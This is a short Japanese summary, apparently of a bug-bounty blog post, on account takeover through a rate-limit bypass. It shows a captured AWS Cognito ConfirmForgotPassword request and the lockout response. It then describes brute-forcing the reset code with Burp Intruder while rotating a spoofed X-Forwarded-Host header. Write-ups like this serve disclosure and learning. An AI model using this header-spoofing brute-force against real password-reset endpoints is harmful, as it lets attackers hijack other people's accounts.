Hello there, ('ω')ノ
レート制限バイパスによるアカウント乗っ取りを。
脆弱性:
レート制限バイパス
アカウント乗っ取り
記事:
https://medium.com/@shamimahamed666070/account-takeover-with-rate-limit-bypass-f28c5089a1eb
今回は、悪意のあるユーザがそのターゲット サイトの任意のアカウントを
乗っ取ることができた可能性のある有効なバグに関する記事を。
会社名は明かせないので、「target.sultandine.com」とて。
Burp Suiteで、このようなリクエストが。
POST / HTTP/2
Host:target.sultandine.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://my.tomorrowland.com/
Content-Type: application/x-amz-json-1.1
X-Amz-Target: AWSCognitoIdentityProviderService.ConfirmForgotPassword
X-Amz-User-Agent: aws-amplify/5.0.4 js
Origin: https://my.tomorrowland.com
Content-Length: 128
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Te: trailers
{"ClientId":"1mf0i80fpuq6mqv5pmgpjb8veg","Username":"lasas28845@galcake.com","ConfirmationCode":"865732","Password":"shamim017"}
これをテストしてオプションを見つけようとしましたが、
パスワードを変更するために使用される ConfirmationCode”:XXXX”、
有効な ConfirmationCode があり。
Burp SuiteのIntruderを使用して、ConfirmationCode をブルート フォースして。
ブルート フォース コードに対して非常に多くのリクエストを送信した後、
リクエストがブロックされ。
{"__type":"LimitExceededException","message":"Attempt limit exceeded, please try after some time."}
次に、リクエストに応じて X-Forwared-Host: 127.0.0.1 を使用して
これをバイパスしようとすると。
これは、制限を正常にバイパスして。
Burp SuiteのIntruder を使用して X-Forwared-Host:127.0.0.$1$ で
複数の IP を変更し、ConfirmationCode で力ずく攻撃を続けると。
非常に多くの有効なコードがパスワードの変更を要求し、
アカウントの乗っ取りに成功して。
Best regards, (^^ゞ